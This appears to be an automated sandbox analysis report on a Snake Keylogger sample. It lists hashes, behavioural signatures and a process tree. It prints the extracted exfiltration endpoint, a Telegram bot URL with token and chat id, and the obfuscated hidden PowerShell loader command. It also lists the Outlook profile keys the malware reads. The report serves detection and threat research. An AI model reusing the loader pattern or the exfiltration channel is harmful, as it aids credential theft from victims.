Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 02:30
Static task
static1
Behavioral task
behavioral1
Sample
6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Shoofa.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Shoofa.ps1
Resource
win10v2004-20241007-en
General
-
Target
6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe
-
Size
701KB
-
MD5
85243ec170323f84e83bd29723bf47ea
-
SHA1
b3e2f340d0b9d4d5407f82e16990daa0cbe3b18c
-
SHA256
6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784
-
SHA512
22843a3a0b24b18346f3a3d9fcfb7c10c23d6efe23879ad78fa08a6652716df6646a6b09f6a6cab774df719fbd865b94f9b97cfde3919c7e8abd2184bb556bf0
-
SSDEEP
12288:G0mnA1zIjZX7y3mc6zhqCnpAYehgvF1L9IMqr9t3DSDb4Nq:uA1zOy2cQht/ehgd1LXw3ewg
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7610532139:AAFiI3HHwFD6pWziyPu3lWJbRKPQtz0nD2c/sendMessage?chat_id=6680692809
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/3560-64-0x0000000001020000-0x0000000002274000-memory.dmp family_snakekeylogger behavioral2/memory/3560-65-0x0000000001020000-0x0000000001046000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1560 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 21 3560 msiexec.exe 24 3560 msiexec.exe 26 3560 msiexec.exe 42 3560 msiexec.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3560 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1560 powershell.exe 3560 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\propangas.lem 6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 1560 powershell.exe 3560 msiexec.exe 3560 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1560 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1560 powershell.exe Token: SeIncreaseQuotaPrivilege 1560 powershell.exe Token: SeSecurityPrivilege 1560 powershell.exe Token: SeTakeOwnershipPrivilege 1560 powershell.exe Token: SeLoadDriverPrivilege 1560 powershell.exe Token: SeSystemProfilePrivilege 1560 powershell.exe Token: SeSystemtimePrivilege 1560 powershell.exe Token: SeProfSingleProcessPrivilege 1560 powershell.exe Token: SeIncBasePriorityPrivilege 1560 powershell.exe Token: SeCreatePagefilePrivilege 1560 powershell.exe Token: SeBackupPrivilege 1560 powershell.exe Token: SeRestorePrivilege 1560 powershell.exe Token: SeShutdownPrivilege 1560 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeSystemEnvironmentPrivilege 1560 powershell.exe Token: SeRemoteShutdownPrivilege 1560 powershell.exe Token: SeUndockPrivilege 1560 powershell.exe Token: SeManageVolumePrivilege 1560 powershell.exe Token: 33 1560 powershell.exe Token: 34 1560 powershell.exe Token: 35 1560 powershell.exe Token: 36 1560 powershell.exe Token: SeDebugPrivilege 3560 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2300 wrote to memory of 1560 2300 6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe 85 PID 2300 wrote to memory of 1560 2300 6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe 85 PID 2300 wrote to memory of 1560 2300 6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe 85 PID 1560 wrote to memory of 3560 1560 powershell.exe 98 PID 1560 wrote to memory of 3560 1560 powershell.exe 98 PID 1560 wrote to memory of 3560 1560 powershell.exe 98 PID 1560 wrote to memory of 3560 1560 powershell.exe 98 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe"C:\Users\Admin\AppData\Local\Temp\6f8a2474ce15e5e5190f6b97bfbf8da3b63224d41e4e7809acb3e1fe328a0784.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Carpetweed=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Shoofa.Rad';$Beskrivelsesrammernes=$Carpetweed.SubString(53953,3);.$Beskrivelsesrammernes($Carpetweed)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3560
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
353KB
MD5e5ab254bbab53479229977e3f42e1e90
SHA16a2906bc6b40497a2a2983a0ef5ce86b479bf609
SHA25654dd5a8f87c375d104d34a41087e06068cf103eedf7928f96dac41342a1c8407
SHA5120f77210ef367ec8b7d7e47c14fdc27974c379123601aa21ccd17fe4e2d005bd0d5ec65262a0cc645e7dbef91f6fadf989f68880b52984971452f8c7f9cbccb83
-
Filesize
52KB
MD5bec5624e576379638737b54edd121409
SHA18bfc71d5fc5bec930fad4dc6e55dadddffc48fdc
SHA256599c9c4648fa3d92c019dc99419cd6e4129d5be92031269d042fca0f16c6ff80
SHA5120ba24ae0bb04460da8459df64b1a91e4bba1fad98028766215eb28e5512a108b8240b6e94f20fabfdeececad40af929c7090e24ac529056901a689f7a1b2bd5f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82